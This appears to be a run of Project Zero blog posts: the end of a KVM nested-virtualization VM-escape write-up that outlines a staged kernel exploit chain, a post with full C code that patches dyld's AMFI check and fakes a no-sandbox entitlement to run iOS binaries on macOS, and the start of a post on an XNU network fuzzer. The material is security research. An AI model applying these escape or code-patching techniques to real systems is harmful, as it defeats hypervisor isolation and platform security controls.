Once the WP bit in CR0 is disabled and the stage1 payload executes, we have a wide range of options. For my proof-of-concept exploit I decided on a somewhat boring but easy-to-implement approach to spawn a random user space command: The host is still in a very weird state so our stage1 payload can’t directly call into other kernel functions, but we can easily backdoor a function pointer which will be called at some later point in time. KVM uses the kernel’s global workqueue feature to regularly synchronize a VM’s clock between different vCPUs. The function pointer responsible for this work is stored in the (per VM) kvm->arch data structure as kvm->arch.kvmclock_update_work. The stage1 payload overwrites this function pointer with the address of a stage2 payload. To put the host into a usable state it then sets the VM_HSAVE_PA MSR back to its original value and restores RSP and RIP to call the original vmexit handler.

The final stage2 payload executes at some later point in time as part of the kernel global work queue and uses call_usermodehelper to run an arbitrary command with root privileges.

Let’s put all of this together and walk through the attack step by step:

  1. Prepare the stage0 payload by splitting it up and setting the right guest MSRs.
  2. Trigger the TOCTOU vulnerability in nested_svm_vmrun and free the MSR permission bitmap by disabling the SVME bit in the EFER MSR.
  3. Wait for the pages to be reused and initialized to 0 to get unrestricted MSR access.
  4. Prepare a fake host save area, a stack for the initial ROP chain and a staging memory area for the stage1 and stage2 payloads.
  5. Leak the HPA of the host save area, the HVA addresses of the stack and staging page and the kvm-amd.ko’s base address using the different IBS infoleaks.
  6. Redirect execution to the VMSAVE gadget by setting RIP, RSP and RAX in the fake host save area, pointing the VM_HSAVE_PA MSR at it and triggering a VM exit.
  7. VMSAVE writes the stage0 payload to an unused offset in kvm-amd’s code segment. When the gadget returns, stage0 gets executed.
  8. stage0 disables Write Protection in CR0 and overwrites an unused executable memory location with the stage1 and stage2 payloads, before jumping to stage1.
  9. stage1 overwrites kvm->arch.kvmclock_update_work.work.func with a pointer to stage2 before restoring the original host context.
  10. At some later point in time kvm->arch.kvmclock_update_work.work.func is called as part of the global kernel work_queue and stage2 spawns an arbitrary command using call_usermodehelper.

Interested readers should take a look at the heavily documented proof-of-concept exploit for the actual implementation.

Conclusion

This blog post describes a KVM-only VM escape made possible by a small bug in KVM’s AMD-specific code for supporting nested virtualization. Luckily, the feature that made this bug exploitable was only included in two kernel versions (v5.10, v5.11) before the issue was spotted, reducing the real-life impact of the vulnerability to a minimum. The bug and its exploit still serve as a demonstration that highly exploitable security vulnerabilities can still exist in the very core of a virtualization engine, which is almost certainly a small and well-audited codebase. While the attack surface of a hypervisor such as KVM is relatively small from a pure LoC perspective, its low-level nature, close interaction with hardware and sheer complexity make it very hard to avoid security-critical bugs.

While we have not seen any in-the-wild exploits targeting hypervisors outside of competitions like Pwn2Own, these capabilities are clearly achievable for a well-financed adversary. I’ve spent around two months on this research, working as an individual with only remote access to an AMD system. Looking at the potential ROI on an exploit like this, it seems safe to assume that more people are working on similar issues right now and that vulnerabilities in KVM, Hyper-V, Xen or VMware will be exploited in-the-wild sooner or later. 

What can we do about this? Security engineers working on Virtualization Security should push for as much attack surface reduction as possible. Moving complex functionality to memory-safe user space components is a big win even if it does not help against bugs like the one described above. Disabling unneeded or unreviewed features and performing regular in-depth code reviews for new changes can further reduce the risk of bugs slipping by.

Hosters, cloud providers and other enterprises that are relying on virtualization for multi-tenancy isolation should design their architecture in a way that limits the impact of an attacker with a VM escape exploit:

  • Isolation of VM hosts: Machines that host untrusted VMs should be considered at least partially untrusted. While a VM escape can give an attacker full control over a single host, it should not be easily possible to move from one compromised host to another. This requires that the control plane and backend infrastructure is sufficiently hardened and that user resources like disk images or encryption keys are only exposed to hosts that need them. One way to limit the impact of a VM escape even further is to only run VMs of a specific customer or of a certain sensitivity on a single machine.
  • Investing in detection capabilities: In most architectures, the behavior of a VM host should be very predictable, making a compromised host stick out quickly once an attacker tries to move to other systems. While it’s very hard to rule out the possibility of a vulnerability in your virtualization stack, good detection capabilities make life for an attacker much harder and increase the risk of quickly burning a high-value vulnerability. Agents running on the VM host can be a first (but bypassable) detection mechanism, but the focus should be on detecting unusual network communication and resource accesses.

Fuzzing iOS code on macOS at native speed

Or how iOS apps on macOS work under the hood

Posted by Samuel Groß, Project Zero

This short post explains how code compiled for iOS can be run natively on Apple Silicon Macs.

With the introduction of Apple Silicon Macs, Apple also made it possible to run iOS apps natively on these Macs. This is fundamentally possible due to (1) iPhones and Apple Silicon Macs both using the arm64 instruction set architecture (ISA) and (2) macOS using a mostly compatible set of runtime libraries and frameworks while also providing /System/iOSSupport which contains the parts of the iOS runtime that do not exist on macOS. Due to this, it should be possible to run not just complete apps but also standalone iOS binaries or libraries on Mac. This might be interesting for a number of reasons, including:

  • It allows fuzzing closed-source code compiled for iOS on a Mac
  • It allows dynamic analysis of iOS code in a more “friendly” environment

This post explains how this can be achieved in practice. The corresponding code can be found here and allows executing arbitrary iOS binaries and library code natively on macOS. The tool assumes that SIP has been disabled and has been tested on macOS 11.2 and 11.3. With SIP enabled, certain steps will probably fail.

We originally developed this tool for fuzzing a 3rd-party iOS messaging app. While that particular project didn’t yield any interesting results, we are making the tool public as it could help lower the barrier of entry for iOS security research.

The Goal

The ultimate goal of this project is to execute code compiled for iOS natively on macOS. While it would be possible to achieve this goal (at least for some binaries/libraries) simply by swapping the platform identifier in the mach-o binary, our approach will instead use the existing infrastructure for running iOS apps on macOS. This has two benefits:

  1. It will guarantee that all dependent system libraries of the iOS code will exist. In practice, this means that if a dependent library does not already exist on macOS, it will automatically be loaded from /System/iOSSupport instead
  2. The runtime (OS services, frameworks, etc.) will, if necessary, emulate their iOS behavior since they will know that the process is an iOS one

To start, we’ll take a simple piece of C source code and compile it for iOS:

> cat hello.c

#include <stdio.h>

int main() {

    puts("Hello from an iOS binary!");

    return 0;

}

> clang -arch arm64 hello.c -o hello -isysroot \

/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk

> file hello

hello: Mach-O 64-bit executable arm64

> otool -l hello

Load command 10

      cmd LC_BUILD_VERSION

  cmdsize 32

 platform 2           # Platform 2 is iOS

    minos 14.4

      sdk 14.4

   ntools 1

     tool 3

  version 609.8

The Kernel

Attempting to execute the freshly compiled binary (on macOS 11.2) will simply result in

> ./hello

[1]    13699 killed     ./hello

While the exit status informs us that the process was terminated through SIGKILL, it does not contain any additional information about the specific reason for that. However, it does seem likely that the process is terminated by the kernel during the execve(2) or posix_spawn(2) syscall. And indeed, the crash report generated by the system states:

Termination Reason:    EXEC, [0xe] Binary with wrong platform

This error corresponds to EXEC_EXIT_REASON_WRONG_PLATFORM in the kernel, and that constant is only referenced in a single function: check_for_signature:

static int

check_for_signature(proc_t p, struct image_params *imgp)

{

    …;

#if XNU_TARGET_OS_OSX

        /* Check for platform passed in spawn attr if iOS binary is being spawned */

        if (proc_platform(p) == PLATFORM_IOS) {

                struct _posix_spawnattr *psa = imgp->ip_px_sa;

                if (psa == NULL || psa->psa_platform == 0) {

                    …;

                            signature_failure_reason = os_reason_create(OS_REASON_EXEC,

                                        EXEC_EXIT_REASON_WRONG_PLATFORM);

                            error = EACCES;

                            goto done;

                } else if (psa->psa_platform != PLATFORM_IOS) {

                        /* Simulator binary spawned with wrong platform */

                        signature_failure_reason = os_reason_create(OS_REASON_EXEC,

                            EXEC_EXIT_REASON_WRONG_PLATFORM);

                        error = EACCES;

                        goto done;

                } else {

                        printf("Allowing spawn of iOS binary %s since correct platform was passed in spawn\n", p->p_name);

                }

        }

#endif /* XNU_TARGET_OS_OSX */

    …;

}

This code is active on macOS and will execute if the platform of the to-be-executed process is PLATFORM_IOS. In essence, the code checks for an undocumented posix_spawn attribute, psa_platform, and in the absence of it (or if its value is not PLATFORM_IOS), will terminate the process in the way we have previously observed.

As such, to avoid EXEC_EXIT_REASON_WRONG_PLATFORM, it should only be necessary to use the undocumented posix_spawnattr_set_platform_np function to set the target platform to PLATFORM_IOS, then invoke posix_spawn to execute the iOS binary:

    posix_spawnattr_t attr;

    posix_spawnattr_init(&attr);

    posix_spawnattr_set_platform_np(&attr, PLATFORM_IOS, 0);

    posix_spawn(&pid, binary_path, NULL, &attr, argv, environ);

Doing that will now result in:

> ./runner hello

...

[*] Child exited with status 5

No more SIGKILL, progress! Exit status 5 corresponds to SIGTRAP, which likely implies that the process is now terminating in userspace. And indeed, the crash report confirms that the process is crashing sometime during library initialization now.

Userspace

At this point we have a PLATFORM_IOS process running in macOS userspace. The next thing that now happens is that dyld, the dynamic linker, starts mapping all libraries that the binary depends on and executes any initializers they might have. Unfortunately, one of the first libraries now being initialized, libsystem_secinit.dylib, tries to determine whether it should initialize the app sandbox based on the binary’s platform and its entitlements. The logic is roughly:

initialize_app_sandbox = False

if entitlement("com.apple.security.app-sandbox") == True:

    initialize_app_sandbox = True

if active_platform() == PLATFORM_IOS &&

   entitlement("com.apple.private.security.no-sandbox") != True:

    initialize_app_sandbox = True

As such, libsystem_secinit will decide that it should initialize the app sandbox and will then contact secinitd(8), “the security policy initialization daemon”, to obtain a sandbox profile. As that daemon cannot determine the app corresponding to the process in question it will fail, and libsystem_secinit.dylib will then abort(3) the process:

(lldb) bt

* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BREAKPOINT

  * frame #0: libsystem_secinit.dylib`_libsecinit_appsandbox.cold.5

    frame #1: libsystem_secinit.dylib`_libsecinit_appsandbox

    frame #2: libsystem_trace.dylib` ...

    frame #3: libsystem_secinit.dylib`_libsecinit_initializer

    frame #4: libSystem.B.dylib`libSystem_initializer

    frame #5: libdyld.dylib`...

    frame #6: libdyld.dylib`...

    frame #7: libdyld.dylib`dyld3::AllImages::runLibSystemInitializer

    frame #8: libdyld.dylib`...

    frame #9: dyld`...

    frame #10: dyld`dyld::_main

    frame #11: dyld`dyldbootstrap::start

    frame #12: dyld`_dyld_start + 56

As a side note, logic like the above will turn out to be a somewhat common theme: various components responsible for the runtime environment will have special handling for iOS binaries, in which case they tend to enforce various policies more aggressively.
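
To make the sandbox decision described in the pseudocode above concrete, here is a small sketch of it as a C predicate. The struct process_model and the function name are hypothetical; the real logic lives inside libsystem_secinit.dylib and may consider more inputs than the two entitlements and the platform shown here.

```c
#include <stdbool.h>

#define PLATFORM_MACOS 1
#define PLATFORM_IOS   2

/* Hypothetical, simplified model of the inputs to the decision. */
struct process_model {
    int platform;                     /* active platform of the process */
    bool has_app_sandbox_entitlement; /* com.apple.security.app-sandbox */
    bool has_no_sandbox_entitlement;  /* com.apple.private.security.no-sandbox */
};

/* Mirrors the rough pseudocode: an explicit opt-in always enables the
 * sandbox, and iOS processes are sandboxed unless they opt out. */
static bool should_initialize_app_sandbox(const struct process_model *p) {
    if (p->has_app_sandbox_entitlement)
        return true;
    if (p->platform == PLATFORM_IOS && !p->has_no_sandbox_entitlement)
        return true;
    return false;
}
```

In this model an iOS process with no entitlements at all still ends up sandboxed, which is the situation the freshly spawned hello binary is in.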

One possible way to solve this would be to sign the iOS binary with a self-signed (and locally trusted) code signing certificate and grant it the “com.apple.private.security.no-sandbox” entitlement. This would then cause libsystem_secinit to not attempt to initialize the app sandbox. Unfortunately, it seems that while AppleMobileFileIntegrity (“amfi” - the OS component implementing various security policies like entitlement and code signing checks) will allow macOS binaries to be signed by locally-trusted code-signing certificates if SIP is disabled, it will not do so for iOS binaries. Instead, it appears to enforce roughly the same requirements as on iOS, namely that the binary must either be signed by Apple directly (in case the app is downloaded from the app store) or there must exist a valid (i.e. one signed by Apple) provisioning profile for the code-signing entity which explicitly allows the entitlements. As such, this path appears to be a dead end.

Another way to work around the sandbox initialization would be to use dyld interposing to replace xpc_copy_entitlements_for_self, which libsystem_secinit invokes to obtain the process’ entitlements, with another function that would simply return the “com.apple.private.security.no-sandbox” entitlement. This would in turn prevent libsystem_secinit from attempting to initialize the sandbox.

Unfortunately, the iOS process is subject to further restrictions, likely part of the “hardened runtime” suite, which cause dyld to disable library interposing (some more information on this mechanism is available here). This policy is also implemented by amfi, in AppleMobileFileIntegrity.kext (the kernel component of amfi):

__int64 __fastcall macos_dyld_policy_library_interposing(proc *a1, int *a2)

{

  int v3; // w8

  v3 = *a2;

  ...

  if ( (v3 & 0x10400) == 0x10000 )   // flag is set for iOS binaries

  {

    logDyldPolicyRejection(a1, "library interposing", "Denying library interposing for iOS app\n");

    return 0LL;

  }

  return 64LL;

}
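
The mask test in the decompiled function above checks two bits at once: the result only equals 0x10000 when bit 0x10000 is set and bit 0x400 is clear. The sketch below spells that out. The macro and function names are hypothetical, and the meaning of the 0x400 bit is not stated in the decompilation, so it is left unnamed here.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical names for the constants seen in the decompiled check. */
#define CHECKED_BITS  0x10400u /* the two bits the kernel looks at */
#define IOS_BIT       0x10000u /* "flag is set for iOS binaries" */
#define OTHER_BIT     0x00400u /* meaning unknown from the decompilation */

/* True when the decompiled function would return 0 (deny interposing):
 * IOS_BIT must be set and OTHER_BIT must be clear. All other bits are
 * ignored by the mask. */
static bool interposing_denied(uint32_t flags) {
    return (flags & CHECKED_BITS) == IOS_BIT;
}
```

For example, a flags value of 0x10001 is denied, while 0x10400 or 0x400 is not.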

As can be seen, AMFI will deny library interposing for all iOS binaries. Unfortunately, I couldn’t come up with a better solution for this than to patch the code of dyld at runtime to ignore AMFI’s policy decision and thus allow library interposing. Fortunately though, doing lightweight runtime code patching is fairly easy through the use of some classic mach APIs:

  1. Find the offset of _amfi_check_dyld_policy_self in /usr/lib/dyld, e.g. with nm(1)
  2. Start the iOS process with the POSIX_SPAWN_START_SUSPENDED attribute so it is initially suspended (the equivalent of SIGSTOP). At this point, only dyld and the binary itself will have been mapped into the process’ memory space by the kernel.
  3. “Attach” to the process using task_for_pid
  4. Find the location of dyld in memory through vm_region_recurse_64
  5. Map dyld’s code section writable using vm_protect(VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY) (where VM_PROT_COPY is seemingly necessary to force the pages to be copied since they are shared)
  6. Patch _amfi_check_dyld_policy_self through vm_write to simply return 0x5f (indicating that dyld interposing and other features should be allowed)
  7. Map dyld’s code section executable again
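
The patch written in step 6 is only three arm64 instructions, which runner.c (Attachment 1) embeds as 12 raw bytes. As a sketch of where those bytes come from, the helpers below assemble MOV X8, #imm; STR X8, [X1]; RET from the standard A64 encodings. The function names are hypothetical and this is not how the original tool produces the patch; it simply hardcodes the bytes.

```c
#include <stdint.h>
#include <string.h>

/* MOVZ Xd, #imm16 (64-bit variant, no shift). */
static uint32_t a64_movz_x(unsigned rd, uint16_t imm16) {
    return 0xD2800000u | ((uint32_t)imm16 << 5) | (rd & 31u);
}

/* STR Xt, [Xn] (64-bit store, unsigned offset of 0). */
static uint32_t a64_str_x(unsigned rt, unsigned rn) {
    return 0xF9000000u | ((rn & 31u) << 5) | (rt & 31u);
}

/* RET (returns to the address in X30). */
static uint32_t a64_ret(void) {
    return 0xD65F03C0u;
}

/* Instructions are stored little-endian in memory. */
static void put_le32(uint8_t *out, uint32_t insn) {
    out[0] = (uint8_t)(insn & 0xff);
    out[1] = (uint8_t)((insn >> 8) & 0xff);
    out[2] = (uint8_t)((insn >> 16) & 0xff);
    out[3] = (uint8_t)((insn >> 24) & 0xff);
}

/* Builds: MOV X8, #policy_flags; STR X8, [X1]; RET */
static void build_policy_patch(uint16_t policy_flags, uint8_t out[12]) {
    put_le32(out + 0, a64_movz_x(8, policy_flags));
    put_le32(out + 4, a64_str_x(8, 1));
    put_le32(out + 8, a64_ret());
}
```

Calling build_policy_patch(0x5f, buf) yields the same 12 bytes as the string literal in runner.c. Note that 0x5f has the 0x40 bit set, which matches the value 64 that the decompiled kernel function returns when interposing is allowed.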

To be able to use the task_for_pid trap, the runner binary will either need the “com.apple.security.cs.debugger” entitlement or root privileges. However, as the runner is a macOS binary, it can be given this entitlement through a self-signed certificate which amfi will then allow.

As such, the full steps necessary to launch an iOS binary on macOS are:

  1. Use the posix_spawnattr_set_platform_np API to set the target platform to PLATFORM_IOS
  2. Execute the new process via posix_spawn(2) and start it suspended
  3. Patch dyld to allow library interposing
  4. In the interposed library, claim to possess the com.apple.private.security.no-sandbox entitlement by replacing xpc_copy_entitlements_for_self
  5. Continue the process by sending it SIGCONT

This can now be seen in action:

> cat hello.c

#include <stdio.h>

int main() {

    puts("Hello from an iOS binary!");

    return 0;

}

> clang -arch arm64 hello.c -o hello -isysroot \

/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk interpose.dylib

> ./runner hello

[*] Preparing to execute iOS binary hello

[+] Child process created with pid: 48302

[*] Patching child process to allow dyld interposing...

[*] _amfi_check_dyld_policy_self at offset 0x54d94 in /usr/lib/dyld

[*] /usr/lib/dyld mapped at 0x1049ec000

[+] Successfully patched _amfi_check_dyld_policy_self

[*] Sending SIGCONT to continue child

[*] Faking no-sandbox entitlement in xpc_copy_entitlements_for_self

Hello from an iOS binary!

[*] Child exited with status 0
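
The addresses printed in the run above make the patch location easy to check by hand. The runner only changes the protection of a single page around the patch address, so the 12 patched bytes must not straddle a page boundary. The sketch below redoes that arithmetic. It assumes a 16 KiB page size (0x4000), which is what Apple Silicon Macs use, and the helper names are hypothetical.

```c
#include <stdint.h>

/* Rounds addr down to the start of its page; page_size must be a power
 * of two. This is the same computation as the page_align macro in
 * runner.c, with the page size passed explicitly. */
static uint64_t page_align_down(uint64_t addr, uint64_t page_size) {
    return addr & ~(page_size - 1);
}

/* Returns 1 if the byte range [addr, addr + len) lies within one page. */
static int fits_in_one_page(uint64_t addr, uint64_t len, uint64_t page_size) {
    return page_align_down(addr, page_size) ==
           page_align_down(addr + len - 1, page_size);
}
```

With dyld mapped at 0x1049ec000 and the function at offset 0x54d94, the patch address is 0x104a40d94, its page starts at 0x104a40000, and the 12 byte patch fits inside that page.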

Fuzzing

With the ability to launch iOS processes, it now becomes possible to fuzz existing iOS code natively on macOS as well. I decided to use Honggfuzz for a simple PoC of this that also used lightweight coverage guidance (based on the Trapfuzz instrumentation approach). The main issue with this approach is that honggfuzz uses the combination of fork(2) followed by execve(2) to create the child processes, while also performing various operations, such as dup2’ing file descriptors, setting environment variables, etc., after forking but before exec’ing. However, the iOS binary must be executed through posix_spawn, which means that these operations must be performed at some other time. Furthermore, as honggfuzz itself is still compiled for macOS, some steps of the compilation of the target binary will fail (they will attempt to link previously compiled .o files, but now the platform no longer matches) and so have to be replaced. There are certainly better ways to do this (and I encourage the reader to implement it properly), but this was the approach that I got to work the quickest.

The hacky proof-of-concept patch for honggfuzz can be found here. In addition to building honggfuzz for arm64, the honggfuzz binary is subsequently signed and given the “com.apple.security.cs.debugger” entitlement in order for task_for_pid to work.
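
One standard way to move work that normally happens between fork and exec into a posix_spawn-based launcher is the POSIX file actions API. The sketch below redirects the child's stdout with posix_spawn_file_actions_adddup2 instead of calling dup2 after forking. It is only an illustration of the general technique: the helper name spawn_with_stdout is hypothetical, and the actual honggfuzz patch may solve the problem differently.

```c
#include <spawn.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/* Hypothetical helper: spawns `path` with its stdout redirected to out_fd.
 * Returns 0 and stores the child's pid on success, otherwise an error
 * number as returned by the posix_spawn family. */
static int spawn_with_stdout(const char *path, char *const argv[],
                             int out_fd, pid_t *pid) {
    posix_spawn_file_actions_t actions;
    int rv = posix_spawn_file_actions_init(&actions);
    if (rv != 0)
        return rv;

    /* Equivalent of dup2(out_fd, STDOUT_FILENO) in the child, performed
     * by posix_spawn itself before the new image starts running. */
    rv = posix_spawn_file_actions_adddup2(&actions, out_fd, STDOUT_FILENO);
    if (rv == 0)
        rv = posix_spawn(pid, path, &actions, NULL, argv, environ);

    posix_spawn_file_actions_destroy(&actions);
    return rv;
}
```

For an iOS target, the NULL attribute argument would be replaced by a posix_spawnattr_t that has the platform set as shown earlier, and environment variables can be passed through the final envp argument rather than being set after forking.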

Conclusion

This blog post discussed how iOS apps are run on macOS and how that functionality can be used to execute any code compiled for iOS natively on macOS. This in turn can facilitate dynamic analysis and fuzzing of iOS code, and thus might make the platform a tiny bit more open for security researchers.

 

Attachment 1: runner.c

// clang -o runner runner.c

// cat <<EOF > entitlements.xml

// <?xml version="1.0" encoding="UTF-8"?>

// <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">

// <plist version="1.0">

// <dict>

//     <key>com.apple.security.cs.debugger</key>

//     <true/>

// </dict>

// </plist>

// EOF

// # Find available code signing identities using `security find-identity`

// codesign -s "$IDENTITY" --entitlements entitlements.xml runner

//

#include <stdbool.h>

#include <stdint.h>

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

#include <dlfcn.h>

#include <signal.h>

#include <unistd.h>

#include <spawn.h>

#include <sys/wait.h>

#include <mach/mach_init.h>

#include <mach/vm_map.h>

#include <mach/vm_page_size.h>

#define page_align(addr) (vm_address_t)((uintptr_t)(addr) & (~(vm_page_size - 1)))

#define PLATFORM_IOS 2

extern char **environ;

extern int posix_spawnattr_set_platform_np(posix_spawnattr_t*, int, int);

void instrument(pid_t pid) {

    kern_return_t kr;

    task_t task;

    puts("[*] Patching child process to allow dyld interposing...");

    // Find patch point

    FILE* output = popen("nm -arch arm64e /usr/lib/dyld  | grep _amfi_check_dyld_policy_self", "r");

    if (output == NULL) {

        perror("popen");

        return;

    }

    unsigned int patch_offset;

    int r = fscanf(output, "%x t _amfi_check_dyld_policy_self", &patch_offset);

    // Close the pipe as soon as the offset has been parsed

    pclose(output);

    if (r != 1) {

        printf("Failed to find offset of _amfi_check_dyld_policy_self in /usr/lib/dyld\n");

        return;

    }

    printf("[*] _amfi_check_dyld_policy_self at offset 0x%x in /usr/lib/dyld\n", patch_offset);

   

    // Attach to the target process

    kr = task_for_pid(mach_task_self(), pid, &task);

    if (kr != KERN_SUCCESS) {

        printf("task_for_pid failed. Is this binary signed and possesses the com.apple.security.cs.debugger entitlement?\n");

        return;

    }

    vm_address_t dyld_addr = 0;

    int headers_found = 0;

    vm_address_t addr = 0;

    vm_size_t size;

    vm_region_submap_info_data_64_t info;

    mach_msg_type_number_t info_count = VM_REGION_SUBMAP_INFO_COUNT_64;

    unsigned int depth = 0;

    while (1) {

        // get next memory region

        kr = vm_region_recurse_64(task, &addr, &size, &depth, (vm_region_info_t)&info, &info_count);

        if (kr != KERN_SUCCESS)

            break;

        unsigned int header;

        vm_size_t bytes_read;

        kr = vm_read_overwrite(task, addr, 4, (vm_address_t)&header, &bytes_read);

        if (kr != KERN_SUCCESS) {

            // TODO handle this, some mappings are probably just not readable

            printf("vm_read_overwrite failed\n");

            return;

        }

        if (bytes_read != 4) {

            // TODO handle this properly

            printf("[-] vm_read read too few bytes\n");

            return;

        }

        if (header == 0xfeedfacf) {

            headers_found++;

        }

        if (headers_found == 2) {

            // This is dyld

            dyld_addr = addr;

            break;

        }

        addr += size;

    }

    if (dyld_addr == 0) {

        printf("[-] Failed to find /usr/lib/dyld\n");

        return;

    }

    printf("[*] /usr/lib/dyld mapped at 0x%lx\n", dyld_addr);

    vm_address_t patch_addr = dyld_addr + patch_offset;

    // VM_PROT_COPY forces COW, probably, see vm_map_protect in vm_map.c

    kr = vm_protect(task, page_align(patch_addr), vm_page_size, false, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY);

    if (kr != KERN_SUCCESS) {

        printf("vm_protect failed\n");

        return;

    }

   

    // MOV X8, 0x5f

    // STR X8, [X1]

    // RET

    const char* code = "\xe8\x0b\x80\xd2\x28\x00\x00\xf9\xc0\x03\x5f\xd6";

    kr = vm_write(task, patch_addr, (vm_offset_t)code, 12);

    if (kr != KERN_SUCCESS) {

        printf("vm_write failed\n");

        return;

    }

    kr = vm_protect(task, page_align(patch_addr), vm_page_size, false, VM_PROT_READ | VM_PROT_EXECUTE);

    if (kr != KERN_SUCCESS) {

        printf("vm_protect failed\n");

        return;

    }

    puts("[+] Successfully patched _amfi_check_dyld_policy_self");

}

int run(const char** argv) {

    pid_t pid;

    int rv;

    posix_spawnattr_t attr;

    rv = posix_spawnattr_init(&attr);

    if (rv != 0) {

        perror("posix_spawnattr_init");

        return -1;

    }

    rv = posix_spawnattr_setflags(&attr, POSIX_SPAWN_START_SUSPENDED);

    if (rv != 0) {

        perror("posix_spawnattr_setflags");

        return -1;

    }

    rv = posix_spawnattr_set_platform_np(&attr, PLATFORM_IOS, 0);

    if (rv != 0) {

        perror("posix_spawnattr_set_platform_np");

        return -1;

    }

    rv = posix_spawn(&pid, argv[0], NULL, &attr, argv, environ);

    if (rv != 0) {

        perror("posix_spawn");

        return -1;

    }

    printf("[+] Child process created with pid: %i\n", pid);

    instrument(pid);

    printf("[*] Sending SIGCONT to continue child\n");

    kill(pid, SIGCONT);

    int status;

    rv = waitpid(pid, &status, 0);

    if (rv == -1) {

        perror("waitpid");

        return -1;

    }

    printf("[*] Child exited with status %i\n", status);

    posix_spawnattr_destroy(&attr);

    return 0;

}

int main(int argc, char* argv[]) {

    if (argc <= 1) {

        printf("Usage: %s path/to/ios_binary\n", argv[0]);

        return 0;

    }

    printf("[*] Preparing to execute iOS binary %s\n", argv[1]);

    return run(argv + 1);

}

Attachment 2: interpose.c

// clang interpose.c -arch arm64 -o interpose.dylib -shared -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk

#include <stdio.h>

#include <unistd.h>

typedef void* xpc_object_t;

extern xpc_object_t xpc_dictionary_create(void*, void*, int);

extern void xpc_dictionary_set_value(xpc_object_t, const char*, xpc_object_t);

extern xpc_object_t xpc_bool_create(int);

extern xpc_object_t xpc_copy_entitlements_for_self();

// From https://opensource.apple.com/source/dyld/dyld-97.1/include/mach-o/dyld-interposing.h.auto.html

/*

 *  Example:

 *

 *  static

 *  int

 *  my_open(const char* path, int flags, mode_t mode)

 *  {

 *    int value;

 *    // do stuff before open (including changing the arguments)

 *    value = open(path, flags, mode);

 *    // do stuff after open (including changing the return value(s))

 *    return value;

 *  }

 *  DYLD_INTERPOSE(my_open, open)

 */

#define DYLD_INTERPOSE(_replacment,_replacee) \

   __attribute__((used)) static struct{ const void* replacment; const void* replacee; } _interpose_##_replacee \

            __attribute__ ((section ("__DATA,__interpose"))) = { (const void*)(unsigned long)&_replacment, (const void*)(unsigned long)&_replacee };

xpc_object_t my_xpc_copy_entitlements_for_self() {

    puts("[*] Faking com.apple.private.security.no-sandbox entitlement in interposed xpc_copy_entitlements_for_self");

    xpc_object_t dict = xpc_dictionary_create(NULL, NULL, 0);

    xpc_dictionary_set_value(dict, "com.apple.private.security.no-sandbox", xpc_bool_create(1));

    return dict;

}

DYLD_INTERPOSE(my_xpc_copy_entitlements_for_self, xpc_copy_entitlements_for_self);

Designing sockfuzzer, a network syscall fuzzer for XNU

Posted by Ned Williamson, Project Zero

Introduction

When I started my 20% project – an initiative where employees are allocated twenty-percent of their paid work time to pursue personal projects –  with Project Zero, I wanted to see if I could apply the techniques I had learned fuzzing Chrome to XNU, the kernel used in iOS and macOS. My interest was sparked after learning some prominent members of the iOS research community believed the kernel was “fuzzed to death,” and my understanding was that most of the top researchers used auditing for vulnerability research. This meant finding new bugs with fuzzing would be meaningful in demonstrating the value of implementing newer fuzzing techniques. In this project, I pursued a somewhat unusual approach to fuzz XNU networking in userland by converting it into a library, “booting” it in userspace and using my standard fuzzing workflow to discover vulnerabilities. Somewhat surprisingly, this worked well enough to reproduce some of my peers’ recent discoveries and report some of my own, one of which was a reliable privilege escalation from the app context, CVE-2019-8605, dubbed “SockPuppet.” I’m excited to open source this fuzzing project, “sockfuzzer,” for the community to learn from and adapt. In this post, we’ll do a deep dive into its design and implementation.

Attack Surface Review and Target Planning

Choosing Networking

We’re at the beginning of a multistage project. I had enormous respect for the difficulty of the task ahead of me. I knew I would need to be careful investing time at each stage of the process, constantly looking for evidence that I needed to change direction. The first big decision was to decide what exactly we wanted to target.

I started by downloading the XNU sources and reviewing them, looking for areas that handled a lot of attacker-controlled input and seemed amenable to fuzzing – immediately the networking subsystem jumped out as worthy of research. I had just exploited a Chrome sandbox bug that leveraged collaboration between an exploited renderer process and a server working in concert. I recognized these attack surfaces’ power, where some security-critical code is “sandwiched” between two attacker-controlled entities. The Chrome browser process is prone to use after free vulnerabilities due to the difficulty of managing state for large APIs, and I suspected XNU would have the same issue. Networking features both parsing and state management. I figured that even if others had already fuzzed the parsers extensively, there could still be use after free vulnerabilities lying dormant.

I then proceeded to look at recent bug reports. Two bugs that caught my eye: the mptcp overflow discovered by Ian Beer and the ICMP out of bounds write found by Kevin Backhouse. Both of these are somewhat “straightforward” buffer overflows. The bugs’ simplicity hinted that kernel networking, even packet parsing, was sufficiently undertested. A fuzzer combining network syscalls and arbitrary remote packets should be large enough in scope to reproduce these issues and find new ones.

Digging deeper, I wanted to understand how to reach these bugs in practice. By cross-referencing the functions and setting kernel breakpoints in a VM, I managed to get a more concrete idea. Here’s the call stack for Ian’s MPTCP bug:

The buggy function in question is mptcp_usr_connectx. Moving up the call stack, we find the connectx syscall, which we see in Ian’s original testcase. If we were to write a fuzzer to find this bug, how would we do it? Ultimately, whatever we do has to both find the bug and give us the information we need to reproduce it on the real kernel. Calling mptcp_usr_connectx directly should surely find the bug, but this seems like the wrong idea because it takes a lot of arguments. Modeling a fuzzer well enough to call this function directly in a way representative of the real code is no easier than auditing the code in the first place, so we’ve not made things any easier by writing a targeted fuzzer. It’s also wasted effort to write a target for each function this small. On the other hand, the further up the call stack we go, the more complexity we may have to support and the less chance we have of landing on the bug. If I were trying to unit test the networking stack, I would probably avoid the syscall layer and call the intermediate helper functions as a middle ground. This is exactly what I tried in the first draft of the fuzzer; I used sock_socket to create struct socket* objects to pass to connectitx in the hopes that it would be easy to reproduce this bug while being high-enough level that this bug could plausibly have been discovered without knowing where to look for it. Surprisingly, after some experimentation, it turned out to be easier to simply call the syscalls directly (via connectx). This makes it easier to translate crashing inputs into programs to run against a real kernel since testcases map 